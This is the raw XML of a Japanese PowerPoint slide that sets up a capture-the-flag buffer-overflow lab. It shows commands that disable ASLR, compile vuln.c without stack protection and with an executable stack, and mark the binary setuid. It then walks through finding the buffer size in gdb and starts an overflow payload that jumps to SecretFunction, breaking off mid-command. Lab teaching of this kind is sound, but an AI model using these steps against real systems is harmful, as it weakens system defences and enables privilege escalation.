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50AC6F-EE7C-4A39-8B8E-E8ABEE4F1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DF88D75-3928-43F2-BA0B-8BA60CB10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303C9C-BE11-4565-854B-893F5E279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929A54-7E0F-4040-A88D-61B5EEF36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20E422-EE8F-4C72-AFC5-C7C504501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8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D573BB-5040-46C2-83D4-34A9E5836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B76C45-2711-46B2-9684-156619D49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8A8115-D488-4D6B-B85B-E4C5D40AF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05F83D-ABB0-421D-B26F-E5CA693E4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F2460B-A35B-4FC0-9B18-86DD2553C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25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F53464-5D72-4BD3-AFF1-D30B5C1A6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A6FA1B-542A-4C1C-BBA8-D213270FA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3B5F44-1FE5-4FA8-A212-812758CB0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66C33B-0662-44D5-826B-A2268BF2A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04A2CE-B9DA-457C-B434-51A178089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86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98471F-2C1E-41E5-8868-AD8F4624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EAF4D3-E2DE-4807-85FF-8409EF397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24A33CB-8B9B-4E12-A031-F8E61A75E2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2586A6-5AE4-415E-A885-0212D5A77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153992-0E1C-4316-9435-2579ED4A8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EEDC5B0-7BB9-42D6-9FFD-24CA2D3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843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47CDFB-4184-40E2-BF04-6735EE3DF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1F167D-FEDC-490E-8F79-F1520443C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BB59B61-5472-4091-B7F4-46446F175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0A89DE4-DC23-44CC-865A-8E494CFC3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96EE353-2170-4ED3-8E88-48495B1DC1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8F33B3F-F878-4E30-ADEE-94D717534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8E5D37E-5631-4432-8516-42B95A315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6BEF10B-6B35-4746-BA73-B77E4493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36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9BD13-AC72-426B-901B-B8ABA28DF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EAF6898-5E7B-4A12-9E70-E4FC6C154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5483A57-9EB7-44F4-A7D1-F1310F375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15B63C-4155-4E1D-918F-08C8CFCDC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9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01B080F-A850-4BE7-8DC6-F2398B892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93A3D16-73A8-427E-9DB3-ED10AC3C3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73868FD-53C5-42B4-84BD-FC2038277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7327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61E565-DEBD-455A-B1A2-359D63CEE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CC9423-82B7-4333-B1A3-848ED76EF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241B8B8-3A99-4FE6-BCFA-D2B863854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41F7C2-CF68-457C-B72C-4DA435DB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15A30A2-9C6A-4442-A114-BEAD2C9DD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5B0931-CD7A-4F4A-8042-5B639449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700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F352C6-5ECE-4E03-ACE5-B86708187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B7DADE1-9D79-4C9D-8180-20AD4955E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207D4BA-6C0F-48E8-B7A8-61D206806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B02C71-1B5E-42BE-A279-239B7607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557119C-BE37-4F15-95C3-E241DAAB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DCBFC18-BDB5-4116-9104-9AA48CB0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809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412C56-E440-471A-8F92-F843E6CF4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7EF8F81-A836-476A-B251-C72EDADF0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12C58A-F762-4F89-BF55-7A362F501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E4B223-BB1C-4243-BE3E-67DD23E6F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4B655A-B676-412C-8254-82B366F40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92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1A3D01E-EC32-4427-8900-615DA9A70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85F44E-66E4-4819-8DE0-F561C802B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798E3B-B0D3-4856-A932-4AADC0918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C5E61F-6623-498D-93F8-A6BA19856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33449C-DBFF-4EB9-8BED-F48BA7CAB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93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76846E4-60F2-440F-A4BF-8CA9F77B8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F8734D-1B6A-4BF4-B267-93F201683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3A6629-CADD-43A3-9D2D-DF08EF9BA4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5B663-77F5-4886-916E-88D56A2C54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005727-0A6C-4B07-AB6F-7CD323927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FC380B-D2C3-4143-8588-DA3C4CB87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1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003FA2-E275-4F43-A852-9C64951746A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379827" y="267287"/>
            <a:ext cx="11296357" cy="6316394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>用の環境作成手順</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>■</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>のコンパイル</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　１．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を無効化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を無効化することで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>メモリアドレスのランダマイズを無効にする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　２．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Canary</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>および</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を無効化するようコンパイル</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　３．ユーザの作成</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>と</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を作成する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　例）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>passwad</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　４．ファイル権限設定（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>フォルダ内に作成する）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out→vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>所有、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>ビットを立てる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　例）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser:vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> 4755 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　　　一般ユーザも実行できる。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>BoF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>成功すると</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>になれる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>flag1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>flag2.txt→vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>所有。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>のみ読み取り可能とする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　例）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> flag1.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> 600 flag1.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　５．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>フォルダの権限設定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>BoF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>成功後に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>として</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>内のファイルを見るために以下の権限が必要</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　例）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> 755 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>■</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>攻撃の実行（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>ctfuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　１．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>でスタックメモリサイズを確認</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>disas</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> foo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>関数内で変数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>用に確保されるサイズを確認する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　→</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>バイトであることを確認</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　２．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>つ目の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を獲得するために</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>SecretFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を呼び出す。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>info functions </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で　上記関数のアドレスを確認</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　引数に適当な文字</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>バイト＋</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>バイト＋関数のアドレスを投入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　例）　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> $(python -c 'print("\x90" * 72 +</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>SecretFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>アドレス </a:t>
            </a:r>
